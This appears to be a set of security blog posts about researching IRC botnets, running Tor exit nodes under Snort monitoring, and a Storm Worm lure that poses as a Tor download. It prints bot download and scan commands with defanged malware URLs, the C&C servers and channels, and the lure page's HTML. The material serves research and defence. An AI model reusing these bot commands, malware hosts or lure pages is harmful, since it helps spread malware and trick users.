Researching your own botnets

This post is mainly for people interested in researching botnets. Many people treat botnet monitoring as a hobby. In many ways, its almost as fun as people watching.

Section 1, the rules of behavior:

You will likely see information you should not normally be privy to. For example, keylogged data, passwords, IP's of vulnerable systems, instant messenger conversations, etc. You must not repeat any private information you see. You must not use any private information you see. You may report leaks of private information to the victim (if known) or law enforcement. Do not report such information to botnet monitoring groups, mailing lists or blogs. Remember, you too could be the victim some day. Treat the data you see with respect.

You may at some point get admin rights on the botnet - Occasional hiccups happen. You must not issue any commands to disrupt the botnet or remove the drones. Issuing commands places you in the same category as the attacker, and in many countries you can be charged criminally if caught. There have been extreme cases where botnet authors replace the remove function with hostile code that causes more damage to the victim PC.

You may contact ISP's, domain registrars, and victims in attempts to get the botnet taken offline. You will likely receive the hairy eyeball - be prepared to back up your accusations/statements with hard facts.

In some countries monitoring botnets is illegal, in others there has not yet been a ruling. Check your local laws before monitoring! Understand you accept all risks. If your not comfortable with this, don't read any further.

You will likely get attacked or threatened. As you learn how the botnets work, you will likely tip your hand. Everyone does. Since botnet hunting has become such an interesting hobby, there are hundreds of other people making these mistakes too. For that reason, the botnet operators (aka herders) have a keen eye and can identify snoopers quickly. In most cases you will simply be denied access to the botnet, by IP banning. In others you will be threatened by the botnet operator, or hit with denial of service attacks. This generally upsets your internet service provider, and you could risk losing internet access.

Never, ever, use proxys to snoop on botnets. If your too chicken to do it from IP addresses you have legitimately rented, then don't track botnets. Using proxy's means you're placing someone else at risk for denial of service attacks, and repeated attacks could mean they lose internet access. While there is a certain risk proxy operators take, your sloppy botnet monitoring skills should not be one of them. Dialup accounts are cheap, between 5 and 10 dollars a month in the US. Use one if you're worried about staying anonymous. Additionally you don't know who may be intercepting proxy traffic. A proxy operator may not be as honest as you, and may use captured botnet traffic maliciously.

Section 2, Locating binaries:

For this section I turned to my old Standby, SearchIRC. Using the keywords ".download http:// .exe" I was able to find:

.download http://www[dot]kartalkusculari[dot]com/oky.exe C:/oky.exe 1
Connects to:
Server: irc.webmaster.com
Port: 6667
Channel: #pert
Channel Topic: .advscan asn2 200 5 0 -r -b
Also downloads http://www[dot]freewebtown[dot]com/hidex/test.exe

.http.exe http://www[dot]freewebtown[dot]com/ssexs/mode.exe C:mode.exe 1
Connects to:
Server: irc.webchat.org
Port: 6667
Channel: #Scanall`

.scarikiamo http://www[dot]freewebtown[dot]com/n0mad/abdo.exe c:/abdo.exe 1
Connects to:
Server: f0ryou.no-ip.info
Port: 6667
Channel: ##!scanall, ##!scanallexp

Other malicious files can be found by looking through the archives at MalwareDomainList and OffensiveComputing.

Section 3, extracting information:

Malware disassembly is an art, and something that can't be explained in a paragraph or two. However there are a few online sandboxes that will assist you as you get started botnet hunting. Anubis and CWSandbox are great. If you have time and resources to spare, investigate creating your own Truman sandnet. Once you've decided to manually reverse engineer malware, I suggest looking around OpenRCE, and attending an Assembler class at a local college.

Other useful tools for new hunters include: Process Explorer, Malcode Analysis Pack, IdaPro, OllyDbg, Cygwin, Perl and Python.

Section 4, putting it all together:

Once you've downloaded a binary, upload it to one of the free sandbox tools listed above. These tools will give pretty detailed information. If your binaries Command and Control (C&C) method is IRC, fire up Infiltrator. Using the sandbox details you should be able to set your username, nickname, and software version to mimic the bot. Connect to the botnet and log the traffic (if permitted by local Laws).

Keep a journal of what you see, learn how the bot interacts with the operator. Learn the commands commonly used, and watch for additional malware as the bots are updated or moved. Note any click-fraud or denial of service attacks.

Section 5, moving on:

Computer security doesn't start or stop with botnets and malware. There are so many more things to explore and learn. Attend conferences, join local user groups and mailing lists, obtain SANS certifications. You never know what the next big thing will be. Stay cutting edge and you will enjoy everything computer security has to offer.

Ever Snort Pot?

For the last couple weeks DISOG has been running dual TOR Exit Nodes for the purpose of identifying malicious activities. We just made up the buzz-word SnortPot...it made a great title for this entry. Using the SNORT IDS we monitored our exit nodes.

We identified six irc networks operating on non-standard ports. Upon further investigation we found four of them were known botnets. These are probably botnet researchers who are too chicken to use their own IPs, rather than botnet owners. The login sequence was captured by the IDS and appeared to be bot like.

There were hundreds of sql injection attacks on servers - High profile agencies like NASA.gov, NIH.gov, MoneyFactory.gov, DCHealth.gov, UTCourts.gov, and VOA.gov were all targeted using what appeared to be automated scripts (the alerts were flying by so fast it was hard to keep up with the snort tail).

We registered over 3000 porn web hits in one day, with 448 name/password combinations using plain text base64 authentication. I Googled some of the credentials and found they had been posted online and had been indexed by Google. In many cases the credentials were posted two or more weeks ago.

Three sites that triggered the child porn rules were turned over to the authorities. All of them were located in Russia.

Our network graphs showed systems in Russia were visited more frequently than any other country. Following Russia was Japan. Around 40% of the packets routed to those two countries.

Only a small percent used tor as a Socks 4a Proxy, so they could perform DNS queries through our systems. Most of those DNS queries were for different torrent trackers. In our experience the majority of our alerts were related to torrents or porn. It is unclear how many of these torrents were in fact porn.

18 malicious executable files were downloaded, not including 1676 CME711 (Storm Worm) binaries. It was obvious that at least one person used our exit nodes to routinely pull binaries from the Storm Servers. (Some researchers have no shame!)

As honeypots go, it was a fairly easy one to setup. Download the TOR Client/Server software, configure it to allow exits, Configure SNORT with the SourceFire VRT and Bleeding Edge rulesets.

The down side is its very hard to keep up with the alerts. Even with the help of BASE we had our hands full tracking down each alert. Even on a slow exit node you could see dozens of alerts per minute.

The IDS was not used to collect data on any of our visitors. We simply used it to trigger signatures that had already been developed. Several emails triggered on porn related topics, and when we identified these alerts were capturing email traffic we commented them out of our signature base to protect the privacy of those using the TOR network.

We could have easily captured all the data and performed more detailed analysis. However, we felt an IDS would give a high level idea of the malicious activities passing through the TOR network while protecting the privacy of legitimate TOR users.

After seeing the alerts TOR traffic created when leaving my exit nodes, I wonder how safe running an open proxy really is. Who is ultimately at risk when someone uses your IP address to attack a server, or to view child porn? The answer hasn't yet been answered in a US Court. So for now, our exit nodes have been disabled.

SnortPots are used every day by security gurus. Many of these types of honeypots sit at the edge of ISP or Corporate IP space. Be aware that any unencrypted internet traffic is visible to the casual snooper.

So whats the difference between using Snort as an IDS or as a Honeypot? - Nothing. I expect everyone to call their Snort sensors 'SnortPots' from now forward. :)

CME711 (Storm) using TOR rouse

This morning I woke up to the latest storm page...

<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">
<html>
<head>
<title>Tor: anonymity online</title>
</head>
<body>
<table border=0 width=\"500\">
<tr><td><img src=\"img/tor1.gif\"></td><td><h2>Tor: anonymity online</h2></td></tr>
<tr><td colspan=\"2\">
<br>
Tor is a toolset for a wide range of organizations and people that want to improve their safety and security on the Internet. Using Tor can help you anonymize web browsing and publishing, instant messaging, IRC, SSH, and other applications that use the TCP protocol. Tor also provides a platform on which software developers can build new applications with built-in anonymity, safety, and privacy features.
<br><br>
Tor aims to defend against traffic analysis, a form of network surveillance that threatens personal anonymity and privacy, confidential business activities and relationships, and state security. Communications are bounced around a distributed network of servers called onion routers, protecting you from websites that build profiles of your interests, local eavesdroppers that read your data or learn what sites you visit, and even the onion routers themselves.<br><br>
<a href=\"tor.exe\"><img src=\"img/tor2.png\" border=0></a>
</td></tr>
</table>
</body>
</html>

The text is a word for word cut and paste from the official TOR website, tor.eff.org.

In summary, they're wagering more clicks by offering The Onion Router (TOR) Proxy. Of course the binary is the standard CME711 trojan, nothing so fancy. At least they could have included TOR in the download!

The files file.php, sony.exe and tor.exe are resolving while video.exe, setup.exe and labor.exe no longer resolve.

UPDATE: TrendMicro has a nice writeup on this too: http://blog.trendmicro.com/nuwar-poses-as-tor-proxy/